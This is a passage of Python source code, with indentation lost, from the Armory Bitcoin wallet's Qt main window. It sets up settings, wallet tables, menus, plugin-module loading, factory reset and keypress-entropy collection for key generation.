if not lastVerStr==currVerStr:
LOGINFO('First load of new version: %s', currVerStr)
self.firstLoadNewVersion = True
self.settings.set('LastVersionLoad', currVerStr)
# Because dynamically retrieving addresses for querying transaction
# comments can be so slow, I use this txAddrMap to cache the mappings
# between tx's and addresses relevant to our wallets. It really only
# matters for massive tx with hundreds of outputs -- but such tx do
# exist and this is needed to accommodate wallets with lots of them.
self.txAddrMap = {}
def updateProgress(val):
if splashScreen is not None:
splashScreen.updateProgress(val)
self.loadWalletsAndSettings(updateProgress)
eulaAgreed = self.getSettingOrSetDefault('Agreed_to_EULA', False)
if not eulaAgreed:
DlgEULA(self,self).exec_()
armoryengine.ArmoryUtils.DEFAULT_ADDR_TYPE = \
self.getSettingOrSetDefault('Default_ReceiveType', 'P2PKH')
if not self.abortLoad:
self.acquireProcessMutex()
# acquireProcessMutex may have set this flag if something went wrong
if self.abortLoad:
LOGWARN('Armory startup was aborted. Closing.')
os._exit(0)
# We need to query this once at the beginning, to avoid having
# strange behavior if the user changes the setting but hasn't
# restarted yet...
self.doAutoBitcoind = \
self.getSettingOrSetDefault('ManageSatoshi', not OS_MACOSX)
# This is a list of alerts that the user has chosen to no longer
# be notified about
alert_str = str(self.getSettingOrSetDefault('IgnoreAlerts', ""))
if alert_str == "":
alerts = []
else:
alerts = alert_str.split(",")
self.ignoreAlerts = {int(s):True for s in alerts}
# Setup system tray and register "bitcoin:" URLs with the OS
self.setupSystemTray()
self.setupUriRegistration()
self.heartbeatCount = 0
self.extraHeartbeatSpecial = []
self.extraHeartbeatAlways = []
self.extraHeartbeatOnline = []
self.extraNewTxFunctions = []
self.extraNewBlockFunctions = []
self.extraShutdownFunctions = []
self.extraGoOnlineFunctions = []
self.oneTimeScanAction = {}
self.walletDialogDict = {}
self.lblArmoryStatus = QRichLabel_AutoToolTip(self.tr('<font color=%1>Offline</font> ').arg(htmlColor('TextWarn')), doWrap=False)
self.statusBar().insertPermanentWidget(0, self.lblArmoryStatus)
# Table for all the wallets
self.walletModel = AllWalletsDispModel(self)
self.walletsView = QTableView(self)
w,h = tightSizeNChar(self.walletsView, 55)
viewWidth = 1.2*w
sectionSz = 1.3*h
viewHeight = 4.4*sectionSz
self.walletsView.setModel(self.walletModel)
self.walletsView.setSelectionBehavior(QTableView.SelectRows)
self.walletsView.setSelectionMode(QTableView.SingleSelection)
self.walletsView.verticalHeader().setDefaultSectionSize(sectionSz)
self.walletsView.setMinimumSize(viewWidth, viewHeight)
self.walletsView.setItemDelegate(AllWalletsCheckboxDelegate(self))
self.walletsView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.walletsView.hideColumn(0)
if self.usermode == USERMODE.Standard:
initialColResize(self.walletsView, [20, 0, 0.35, 0.2, 0.2])
else:
initialColResize(self.walletsView, [20, 0.15, 0.30, 0.2, 0.20])
if self.settings.hasSetting('LastFilterState'):
if self.settings.get('LastFilterState')==4:
self.walletsView.showColumn(0)
self.connect(self.walletsView, SIGNAL('doubleClicked(QModelIndex)'),
self.execDlgWalletDetails)
self.connect(self.walletsView, SIGNAL('clicked(QModelIndex)'),
self.execClickRow)
self.walletsView.setColumnWidth(WLTVIEWCOLS.Visible, 20)
w,h = tightSizeNChar(GETFONT('var'), 100)
# Prepare for tableView slices (i.e. "Showing 1 to 100 of 382", etc)
self.numShowOpts = [100,250,500,1000,'All']
self.sortLedgOrder = Qt.AscendingOrder
self.sortLedgCol = 0
self.currLedgMin = 1
self.currLedgMax = 100
self.currLedgWidth = 100
btnAddWallet = QPushButton(self.tr("Create Wallet"))
btnImportWlt = QPushButton(self.tr("Import or Restore Wallet"))
self.connect(btnAddWallet, SIGNAL('clicked()'), self.startWalletWizard)
self.connect(btnImportWlt, SIGNAL('clicked()'), self.execImportWallet)
# Put the Wallet info into it's own little box
lblAvail = QLabel(self.tr("<b>Available Wallets:</b>"))
viewHeader = makeLayoutFrame(HORIZONTAL, [lblAvail, \
'Stretch', \
btnAddWallet, \
btnImportWlt, ])
wltFrame = QFrame()
wltFrame.setFrameStyle(QFrame.Box|QFrame.Sunken)
wltLayout = QGridLayout()
wltLayout.addWidget(viewHeader, 0,0, 1,3)
wltLayout.addWidget(self.walletsView, 1,0, 1,3)
wltFrame.setLayout(wltLayout)
# Make the bottom 2/3 a tabwidget
self.mainDisplayTabs = QTabWidget()
# Put the labels into scroll areas just in case window size is small.
self.tabDashboard = QWidget()
self.setupDashboard()
# Combo box to filter ledger display
self.comboWltSelect = QComboBox()
self.populateLedgerComboBox()
self.connect(self.comboWltSelect, SIGNAL('activated(int)'),
self.changeWltFilter)
self.lblTot = QRichLabel(self.tr('<b>Maximum Funds:</b>'), doWrap=False);
self.lblSpd = QRichLabel(self.tr('<b>Spendable Funds:</b>'), doWrap=False);
self.lblUcn = QRichLabel(self.tr('<b>Unconfirmed:</b>'), doWrap=False);
self.lblTotalFunds = QRichLabel('-'*12, doWrap=False)
self.lblSpendFunds = QRichLabel('-'*12, doWrap=False)
self.lblUnconfFunds = QRichLabel('-'*12, doWrap=False)
self.lblTotalFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpendFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUnconfFunds.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblTot.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblSpd.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblUcn.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.lblBTC1 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC2 = QRichLabel('<b>BTC</b>', doWrap=False)
self.lblBTC3 = QRichLabel('<b>BTC</b>', doWrap=False)
self.ttipTot = self.createToolTipWidget( self.tr(
'Funds if all current transactions are confirmed. '
'Value appears gray when it is the same as your spendable funds.'))
self.ttipSpd = self.createToolTipWidget( self.tr('Funds that can be spent <i>right now</i>'))
self.ttipUcn = self.createToolTipWidget( self.tr(
'Funds that have less than 6 confirmations, and thus should not '
'be considered <i>yours</i>, yet.'))
self.frmTotals = QFrame()
self.frmTotals.setFrameStyle(STYLE_NONE)
frmTotalsLayout = QGridLayout()
frmTotalsLayout.addWidget(self.lblTot, 0,0)
frmTotalsLayout.addWidget(self.lblSpd, 1,0)
frmTotalsLayout.addWidget(self.lblUcn, 2,0)
frmTotalsLayout.addWidget(self.lblTotalFunds, 0,1)
frmTotalsLayout.addWidget(self.lblSpendFunds, 1,1)
frmTotalsLayout.addWidget(self.lblUnconfFunds, 2,1)
frmTotalsLayout.addWidget(self.lblBTC1, 0,2)
frmTotalsLayout.addWidget(self.lblBTC2, 1,2)
frmTotalsLayout.addWidget(self.lblBTC3, 2,2)
frmTotalsLayout.addWidget(self.ttipTot, 0,3)
frmTotalsLayout.addWidget(self.ttipSpd, 1,3)
frmTotalsLayout.addWidget(self.ttipUcn, 2,3)
self.frmTotals.setLayout(frmTotalsLayout)
# Add the available tabs to the main tab widget
self.MAINTABS = enum('Dash','Ledger')
self.mainDisplayTabs.addTab(self.tabDashboard, self.tr('Dashboard'))
##########################################################################
if not CLI_OPTIONS.disableModules:
if USE_TESTNET or USE_REGTEST:
self.loadArmoryModulesNoZip()
# Armory Modules are diabled on main net. If enabled it uses zip files to
# contain the modules
# else:
# self.loadArmoryModules()
##########################################################################
self.lbDialog = None
btnSendBtc = QPushButton(self.tr("Send Bitcoins"))
btnRecvBtc = QPushButton(self.tr("Receive Bitcoins"))
btnWltProps = QPushButton(self.tr("Wallet Properties"))
btnOfflineTx = QPushButton(self.tr("Offline Transactions"))
btnMultisig = QPushButton(self.tr("Lockboxes (Multi-Sig)"))
self.connect(btnWltProps, SIGNAL('clicked()'), self.execDlgWalletDetails)
self.connect(btnRecvBtc, SIGNAL('clicked()'), self.clickReceiveCoins)
self.connect(btnSendBtc, SIGNAL('clicked()'), self.clickSendBitcoins)
self.connect(btnOfflineTx,SIGNAL('clicked()'), self.execOfflineTx)
self.connect(btnMultisig, SIGNAL('clicked()'), self.browseLockboxes)
verStr = 'Armory %s / %s' % (getVersionString(BTCARMORY_VERSION),
UserModeStr(self, self.usermode))
lblInfo = QRichLabel(verStr, doWrap=False)
lblInfo.setFont(GETFONT('var',10))
lblInfo.setAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
logoBtnFrame = []
logoBtnFrame.append(self.lblLogoIcon)
logoBtnFrame.append(btnSendBtc)
logoBtnFrame.append(btnRecvBtc)
logoBtnFrame.append(btnWltProps)
if self.usermode in (USERMODE.Advanced, USERMODE.Expert):
logoBtnFrame.append(btnOfflineTx)
if self.usermode in (USERMODE.Expert,):
logoBtnFrame.append(btnMultisig)
logoBtnFrame.append(lblInfo)
logoBtnFrame.append('Stretch')
btnFrame = makeVertFrame(logoBtnFrame, STYLE_SUNKEN)
logoWidth=220
btnFrame.sizeHint = lambda: QSize(logoWidth*1.0, 10)
btnFrame.setMaximumWidth(logoWidth*1.2)
btnFrame.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Expanding)
layout = QGridLayout()
layout.addWidget(btnFrame, 0, 0, 1, 1)
layout.addWidget(wltFrame, 0, 1, 1, 1)
layout.addWidget(self.mainDisplayTabs, 1, 0, 1, 2)
layout.setRowStretch(0, 1)
layout.setRowStretch(1, 5)
# Attach the layout to the frame that will become the central widget
mainFrame = QFrame()
mainFrame.setLayout(layout)
self.setCentralWidget(mainFrame)
self.setMinimumSize(750,500)
# Start the user at the dashboard
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
##########################################################################
# Set up menu and actions
#MENUS = enum('File', 'Wallet', 'User', "Tools", "Network")
currmode = self.getSettingOrSetDefault('User_Mode', 'Advanced')
MENUS = enum('File', 'User', 'Tools', 'Addresses', 'Wallets', \
'MultiSig', 'Help')
self.menu = self.menuBar()
self.menusList = []
self.menusList.append( self.menu.addMenu(self.tr('&File')) )
self.menusList.append( self.menu.addMenu(self.tr('&User')) )
self.menusList.append( self.menu.addMenu(self.tr('&Tools')) )
self.menusList.append( self.menu.addMenu(self.tr('&Addresses')) )
self.menusList.append( self.menu.addMenu(self.tr('&Wallets')) )
self.menusList.append( self.menu.addMenu(self.tr('&MultiSig')) )
self.menusList.append( self.menu.addMenu(self.tr('&Help')) )
#self.menusList.append( self.menu.addMenu('&Network') )
def exportTx():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, self.tr('Transactions Unavailable'),
self.tr('Transaction history cannot be collected until Armory is '
'in online mode. Please try again when Armory is online. '),
QMessageBox.Ok)
return
else:
DlgExportTxHistory(self,self).exec_()
actExportTx = self.createAction(self.tr('&Export Transactions...'), exportTx)
actSettings = self.createAction(self.tr('&Settings...'), self.openSettings)
actMinimApp = self.createAction(self.tr('&Minimize Armory'), self.minimizeArmory)
actExportLog = self.createAction(self.tr('Export &Log File...'), self.exportLogFile)
actCloseApp = self.createAction(self.tr('&Quit Armory'), self.closeForReal)
self.menusList[MENUS.File].addAction(actExportTx)
self.menusList[MENUS.File].addAction(actSettings)
self.menusList[MENUS.File].addAction(actMinimApp)
self.menusList[MENUS.File].addAction(actExportLog)
self.menusList[MENUS.File].addAction(actCloseApp)
def chngStd(b):
if b: self.setUserMode(USERMODE.Standard)
def chngAdv(b):
if b: self.setUserMode(USERMODE.Advanced)
def chngDev(b):
if b: self.setUserMode(USERMODE.Expert)
modeActGrp = QActionGroup(self)
actSetModeStd = self.createAction(self.tr('&Standard'), chngStd, True)
actSetModeAdv = self.createAction(self.tr('&Advanced'), chngAdv, True)
actSetModeDev = self.createAction(self.tr('&Expert'), chngDev, True)
modeActGrp.addAction(actSetModeStd)
modeActGrp.addAction(actSetModeAdv)
modeActGrp.addAction(actSetModeDev)
self.menusList[MENUS.User].addAction(actSetModeStd)
self.menusList[MENUS.User].addAction(actSetModeAdv)
self.menusList[MENUS.User].addAction(actSetModeDev)
LOGINFO('Usermode: %s', currmode)
self.firstModeSwitch=True
if currmode=='Standard':
self.usermode = USERMODE.Standard
actSetModeStd.setChecked(True)
elif currmode=='Advanced':
self.usermode = USERMODE.Advanced
actSetModeAdv.setChecked(True)
elif currmode=='Expert':
self.usermode = USERMODE.Expert
actSetModeDev.setChecked(True)
def openMsgSigning():
MessageSigningVerificationDialog(self,self).exec_()
def openBlindBroad():
if not TheSDM.satoshiIsAvailable():
QMessageBox.warning(self, self.tr("Not Online"), self.tr(
'Bitcoin Core is not available, so Armory will not be able '
'to broadcast any transactions for you.'), QMessageBox.Ok)
return
DlgBroadcastBlindTx(self,self).exec_()
actOpenSigner = self.createAction(self.tr('&Message Signing/Verification...'), openMsgSigning)
if currmode=='Expert':
actOpenTools = self.createAction(self.tr('&EC Calculator...'), lambda: DlgECDSACalc(self,self, 1).exec_())
actBlindBroad = self.createAction(self.tr('&Broadcast Raw Transaction...'), openBlindBroad)
self.menusList[MENUS.Tools].addAction(actOpenSigner)
if currmode=='Expert':
self.menusList[MENUS.Tools].addAction(actOpenTools)
self.menusList[MENUS.Tools].addAction(actBlindBroad)
def mkprom():
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
QMessageBox.warning(self, self.tr('Offline'), self.tr(
'Armory is currently offline, and cannot determine what funds are '
'available for Simulfunding. Please try again when Armory is in '
'online mode.'), QMessageBox.Ok)
else:
DlgCreatePromNote(self, self).exec_()
def msrevsign():
title = self.tr('Import Multi-Spend Transaction')
descr = self.tr(
'Import a signature-collector text block for review and signing. '
'It is usually a block of text with "TXSIGCOLLECT" in the first line, '
'or a <i>*.sigcollect.tx</i> file.')
ftypes = ['Signature Collectors (*.sigcollect.tx)']
dlgImport = DlgImportAsciiBlock(self, self, title, descr, ftypes,
UnsignedTransaction)
dlgImport.exec_()
if dlgImport.returnObj:
DlgMultiSpendReview(self, self, dlgImport.returnObj).exec_()
simulMerge = lambda: DlgMergePromNotes(self, self).exec_()
actMakeProm = self.createAction(self.tr('Simulfund &Promissory Note'), mkprom)
actPromCollect = self.createAction(self.tr('Simulfund &Collect && Merge'), simulMerge)
actMultiSpend = self.createAction(self.tr('Simulfund &Review && Sign'), msrevsign)
if not self.usermode==USERMODE.Expert:
self.menusList[MENUS.MultiSig].menuAction().setVisible(False)
# Addresses
actAddrBook = self.createAction(self.tr('View &Address Book...'), self.execAddressBook)
actSweepKey = self.createAction(self.tr('&Sweep Private Key/Address...'), self.menuSelectSweepKey)
actImportKey = self.createAction(self.tr('&Import Private Key/Address...'), self.menuSelectImportKey)
self.menusList[MENUS.Addresses].addAction(actAddrBook)
if not currmode=='Standard':
self.menusList[MENUS.Addresses].addAction(actImportKey)
self.menusList[MENUS.Addresses].addAction(actSweepKey)
actCreateNew = self.createAction(self.tr('&Create New Wallet'), self.startWalletWizard)
actImportWlt = self.createAction(self.tr('&Import or Restore Wallet'), self.execImportWallet)
actAddressBook = self.createAction(self.tr('View &Address Book'), self.execAddressBook)
actRecoverWlt = self.createAction(self.tr('&Fix Damaged Wallet'), self.RecoverWallet)
self.menusList[MENUS.Wallets].addAction(actCreateNew)
self.menusList[MENUS.Wallets].addAction(actImportWlt)
self.menusList[MENUS.Wallets].addSeparator()
self.menusList[MENUS.Wallets].addAction(actRecoverWlt)
execAbout = lambda: DlgHelpAbout(self).exec_()
actAboutWindow = self.createAction(self.tr('&About Armory...'), execAbout)
actClearMemPool = self.createAction(self.tr('Clear All Unconfirmed'), self.clearMemoryPool)
actRescanDB = self.createAction(self.tr('Rescan Databases'), self.rescanNextLoad)
actRebuildDB = self.createAction(self.tr('Rebuild and Rescan Databases'), self.rebuildNextLoad)
actRescanBalance = self.createAction(self.tr('Rescan Balance'), self.rescanBalanceNextLoad)
actFactoryReset = self.createAction(self.tr('Factory Reset'), self.factoryReset)
self.menusList[MENUS.Help].addAction(actAboutWindow)
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addSeparator()
self.menusList[MENUS.Help].addAction(actClearMemPool)
self.menusList[MENUS.Help].addAction(actRescanBalance)
self.menusList[MENUS.Help].addAction(actRescanDB)
self.menusList[MENUS.Help].addAction(actRebuildDB)
self.menusList[MENUS.Help].addAction(actFactoryReset)
execMSHack = lambda: DlgSelectMultiSigOption(self,self).exec_()
execBrowse = lambda: DlgLockboxManager(self,self).exec_()
actMultiHacker = self.createAction(self.tr('Multi-Sig Lockboxes'), execMSHack)
actBrowseLockboxes = self.createAction(self.tr('Lockbox &Manager...'), execBrowse)
#self.menusList[MENUS.MultiSig].addAction(actMultiHacker)
self.menusList[MENUS.MultiSig].addAction(actBrowseLockboxes)
self.menusList[MENUS.MultiSig].addAction(actMakeProm)
self.menusList[MENUS.MultiSig].addAction(actPromCollect)
self.menusList[MENUS.MultiSig].addAction(actMultiSpend)
self.startBlockchainProcessingInitialization()
# Restore any main-window geometry saved in the settings file
hexgeom = self.settings.get('MainGeometry')
hexwltsz = self.settings.get('MainWalletCols')
if len(hexgeom)>0:
geom = QByteArray.fromHex(hexgeom)
self.restoreGeometry(geom)
if len(hexwltsz)>0:
restoreTableView(self.walletsView, hexwltsz)
if DO_WALLET_CHECK:
self.checkWallets()
self.blkReceived = RightNow()
self.setDashboardDetails()
self.execIntroDialog()
#reactor.callLater(1, self.Heartbeat)
if self.getSettingOrSetDefault('MinimizeOnOpen', False) and not CLI_ARGS:
LOGINFO('MinimizeOnOpen is True')
self.minimizeArmory()
if CLI_ARGS:
self.signalExecution.callLater(1, self.uriLinkClicked, CLI_ARGS[0])
if OS_MACOSX:
self.macNotifHdlr = ArmoryMac.MacNotificationHandler()
# Now that construction of the UI is done
# Check for warnings to be displayed
# This is true if and only if the command line has a data dir that doesn't exist
# and can't be created.
if not CLI_OPTIONS.datadir in [ARMORY_HOME_DIR, DEFAULT]:
QMessageBox.warning(self, self.tr('Default Data Directory'), self.tr(
'Armory is using the default data directory because '
'the data directory specified in the command line could '
'not be found nor created.'), QMessageBox.Ok)
# This is true if and only if the command line has a database dir that doesn't exist
# and can't be created.
elif not CLI_OPTIONS.armoryDBDir in [ARMORY_DB_DIR, DEFAULT]:
QMessageBox.warning(self, self.tr('Default Database Directory'), self.tr(
'Armory is using the default database directory because '
'the database directory specified in the command line could '
'not be found nor created.'), QMessageBox.Ok)
# This is true if and only if the command line has a bitcoin dir that doesn't exist
#if not CLI_OPTIONS.satoshiHome in [BTC_HOME_DIR, DEFAULT]:
# QMessageBox.warning(self, self.tr('Bitcoin Directory'), self.tr(
# 'Armory is using the default Bitcoin directory because '
# 'the Bitcoin directory specified in the command line could '
# 'not be found.'), QMessageBox.Ok)
if not self.getSettingOrSetDefault('DNAA_DeleteLevelDB', False) and \
os.path.exists(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA)):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Delete Old DB Directory'),
self.tr('Armory detected an older version Database. '
'Do you want to delete the old database? Choose yes if '
'do not think that you will revert to an older version of Armory.'), self.tr('Do not ask this question again'))
if reply[0]==True:
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_BLKDATA))
shutil.rmtree(os.path.join(ARMORY_DB_DIR, LEVELDB_HEADERS))
if reply[1]==True:
self.writeSetting('DNAA_DeleteLevelDB', True)
self.signalExecution.callLater(1, self.walletTimeoutCheck)
####################################################
def getWatchingOnlyWallets(self):
result = []
for wltID in self.walletIDList:
if self.walletMap[wltID].watchingOnly:
result.append(wltID)
return result
####################################################
def changeWltFilter(self):
if self.netMode == NETWORKMODE.Offline:
return
currIdx = max(self.comboWltSelect.currentIndex(), 0)
currText = unicode(self.comboWltSelect.currentText()).lower()
if currText.lower().startswith('custom filter'):
self.walletsView.showColumn(0)
#self.walletsView.resizeColumnToContents(0)
else:
self.walletsView.hideColumn(0)
if currIdx != 4:
for i in range(0, len(self.walletVisibleList)):
self.walletVisibleList[i] = False
# If a specific wallet is selected, just set that and you're done
if currIdx > 4:
self.walletVisibleList[currIdx-7] = True
self.setWltSetting(self.walletIDList[currIdx-7], 'LedgerShow', True)
else:
# Else we walk through the wallets and flag the particular ones
typelist = [[wid, determineWalletType(self.walletMap[wid], self)[0]] \
for wid in self.walletIDList]
for i,winfo in enumerate(typelist):
wid,wtype = winfo[:]
if currIdx==0:
# My wallets
doShow = wtype in [WLTTYPES.Offline,WLTTYPES.Crypt,WLTTYPES.Plain]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==1:
# Offline wallets
doShow = winfo[1] in [WLTTYPES.Offline]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==2:
# Others' Wallets
doShow = winfo[1] in [WLTTYPES.WatchOnly]
self.walletVisibleList[i] = doShow
self.setWltSetting(wid, 'LedgerShow', doShow)
elif currIdx==3:
# All Wallets
self.walletVisibleList[i] = True
self.setWltSetting(wid, 'LedgerShow', True)
self.mainLedgerCurrentPage = 1
self.PageLineEdit.setText(unicode(self.mainLedgerCurrentPage))
self.wltIDList = []
for i,vis in enumerate(self.walletVisibleList):
if vis:
wltid = self.walletIDList[i]
if self.walletMap[wltid].isEnabled:
self.wltIDList.append(wltid)
TheBDM.bdv().updateWalletsLedgerFilter(self.wltIDList)
############################################################################
def loadArmoryModulesNoZip(self):
"""
This method checks for any .py files in the exec directory
"""
moduleDir = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if not moduleDir or not os.path.exists(moduleDir):
return
LOGWARN('Attempting to load modules from: %s' % MODULES_ZIP_DIR_NAME)
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleListNoZip(moduleDir)
for moduleName,infoMap in modMap.iteritems():
module = dynamicImportNoZip(moduleDir, moduleName, globals())
plugObj = module.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critmoduleName(self, self.tr("Bad Module"), self.tr(
'The module you attempted to load (%1) is malformed. It is '
'missing attributes that are needed for Armory to load it. '
'It will be skipped.').arg(moduleName), QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt >verPluginInt:
reply = QMessageBox.warning(self, self.tr("Outdated Module"), self.tr(
'Module "%1" is only specified to work up to Armory version %2. '
'You are using Armory version %3. Please remove the module if '
'you experience any problems with it, or contact the maintainer '
'for a new version. '
'<br><br> '
'Do you want to continue loading the module?').arg(moduleName),
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "tabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra methods that will be
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Add any methods
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
############################################################################
def loadArmoryModules(self):
"""
This method checks for any .zip files in the modules directory
"""
modulesZipDirPath = os.path.join(GetExecDir(), MODULES_ZIP_DIR_NAME)
if modulesZipDirPath and os.path.exists(modulesZipDirPath):
self.tempModulesDirName = tempfile.mkdtemp('modules')
# This call does not eval any code in the modules. It simply
# loads the python files as raw chunks of text so we can
# check hashes and signatures
modMap = getModuleList(modulesZipDirPath)
for moduleName,infoMap in modMap.iteritems():
moduleZipPath = os.path.join(modulesZipDirPath, infoMap[MODULE_PATH_KEY])
if infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Invalid:
reply = QMessageBox.warning(self, self.tr("Invalid Module"), self.tr(
'Armory detected the following module which is '
'<font color=%1><b>invalid</b></font>:'
'<br><br>'
' <b>Module Name:</b> %2<br>'
' <b>Module Path:</b> %3<br>'
'<br><br>'
'Armory will only run a module from a zip file that '
'has the required stucture.').arg(htmlColor('TextRed'), moduleName, moduleZipPath), QMessageBox.Ok)
elif not USE_TESTNET and not USE_REGTEST and infoMap[MODULE_ZIP_STATUS_KEY] == MODULE_ZIP_STATUS.Unsigned:
reply = QMessageBox.warning(self, self.tr("UNSIGNED Module"), self.tr(
'Armory detected the following module which '
'<font color="%1"><b>has not been signed by Armory</b></font> and may be dangerous: '
'<br><br>'
' <b>Module Name:</b> %2<br>'
' <b>Module Path:</b> %3<br>'
'<br><br>'
'Armory will not allow you to run this module.').arg(htmlColor('TextRed'), moduleName, moduleZipPath), QMessageBox.Ok)
else:
ZipFile(moduleZipPath).extract(INNER_ZIP_FILENAME, self.tempModulesDirName)
ZipFile(os.path.join(self.tempModulesDirName,INNER_ZIP_FILENAME)).extractall(self.tempModulesDirName)
plugin = importModule(self.tempModulesDirName, moduleName, globals())
plugObj = plugin.PluginObject(self)
if not hasattr(plugObj,'getTabToDisplay') or \
not hasattr(plugObj,'tabName'):
LOGERROR('Module is malformed! No tabToDisplay or tabName attrs')
QMessageBox.critmoduleName(self, self.tr("Bad Module"), self.tr(
'The module you attempted to load (%1) is malformed. It is '
'missing attributes that are needed for Armory to load it. '
'It will be skipped.').arg(moduleName), QMessageBox.Ok)
continue
verPluginInt = getVersionInt(readVersionString(plugObj.maxVersion))
verArmoryInt = getVersionInt(BTCARMORY_VERSION)
if verArmoryInt >verPluginInt:
reply = QMessageBox.warning(self, self.tr("Outdated Module"), self.tr(
'Module %1 is only specified to work up to Armory version %2. '
'You are using Armory version %3. Please remove the module if '
'you experience any problems with it, or contact the maintainer '
'for a new version.'
'<br><br>'
'Do you want to continue loading the module?').arg(moduleName, plugObj.maxVersion, getVersionString(BTCARMORY_VERSION)),
QMessageBox.Yes | QMessageBox.No)
if not reply==QMessageBox.Yes:
continue
# All plugins should have "tabToDisplay" and "tabName" attributes
LOGWARN('Adding module to tab list: "' + plugObj.tabName + '"')
self.mainDisplayTabs.addTab(plugObj.getTabToDisplay(), plugObj.tabName)
# Also inject any extra methods that will be
injectFuncList = [ \
['injectHeartbeatAlwaysFunc', 'extraHeartbeatAlways'],
['injectHeartbeatOnlineFunc', 'extraHeartbeatOnline'],
['injectGoOnlineFunc', 'extraGoOnlineFunctions'],
['injectNewTxFunc', 'extraNewTxFunctions'],
['injectNewBlockFunc', 'extraNewBlockFunctions'],
['injectShutdownFunc', 'extraShutdownFunctions'] ]
# Add any methods
for plugFuncName,funcListName in injectFuncList:
if not hasattr(plugObj, plugFuncName):
continue
if not hasattr(self, funcListName):
LOGERROR('Missing an ArmoryQt list variable: %s' % funcListName)
continue
LOGINFO('Found module function: %s' % plugFuncName)
funcList = getattr(self, funcListName)
plugFunc = getattr(plugObj, plugFuncName)
funcList.append(plugFunc)
############################################################################
def factoryReset(self):
"""
reply = QMessageBox.information(self,'Factory Reset', \
'You are about to revert all Armory settings '
'to the state they were in when Armory was first installed. '
'<br><br>'
'If you click "Yes," Armory will exit after settings are '
'reverted. You will have to manually start Armory again.'
'<br><br>'
'Do you want to continue? ', \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.removeSettingsOnClose = True
self.closeForReal()
"""
if DlgFactoryReset(self,self).exec_():
# The dialog already wrote all the flag files, just close now
self.closeForReal()
####################################################
def clearMemoryPool(self):
touchFile( os.path.join(ARMORY_HOME_DIR, 'clearmempool.flag') )
msg = self.tr(
'The next time you restart Armory, all unconfirmed transactions will '
'be cleared allowing you to retry any stuck transactions.')
if not self.doAutoBitcoind:
msg += self.tr(
'<br><br>Make sure you also restart Bitcoin Core '
'(or bitcoind) and let it synchronize again before you restart '
'Armory. Doing so will clear its memory pool as well.')
QMessageBox.information(self, self.tr('Memory Pool'), msg, QMessageBox.Ok)
####################################################
def registerWidgetActivateTime(self, widget):
# This is a bit of a hack, but it's a very isolated method to make
# it easy to link widgets to my entropy accumulator
# I just realized this doesn't do exactly what I originally intended...
# I wanted it to work on arbitrary widgets like QLineEdits, but using
# super is not the answer. What I want is the original class method
# to be called after logging keypress, not its superclass method.
# Nonetheless, it does do what I need it to, as long as you only
# registered frames and dialogs, not individual widgets/controls.
mainWindow = self
def newKPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyPressEvent(event)
def newKRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).keyReleaseEvent(event)
def newMPE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mousePressEvent(event)
def newMRE(wself, event=None):
mainWindow.logEntropy()
super(wself.__class__, wself).mouseReleaseEvent(event)
from types import MethodType
widget.keyPressEvent = MethodType(newKPE, widget)
widget.keyReleaseEvent = MethodType(newKRE, widget)
widget.mousePressEvent = MethodType(newMPE, widget)
widget.mouseReleaseEvent = MethodType(newMRE, widget)
####################################################
def logEntropy(self):
try:
self.entropyAccum.append(RightNow())
self.entropyAccum.append(QCursor.pos().x())
self.entropyAccum.append(QCursor.pos().y())
except:
LOGEXCEPT('Error logging keypress entropy')
####################################################
def getExtraEntropyForKeyGen(self):
# The entropyAccum var has all the timestamps, down to the microsecond,
# of every keypress and mouseclick made during the wallet creation
# wizard. Also logs mouse positions on every press, though it will
# be constant while typing. Either way, even, if they change no text
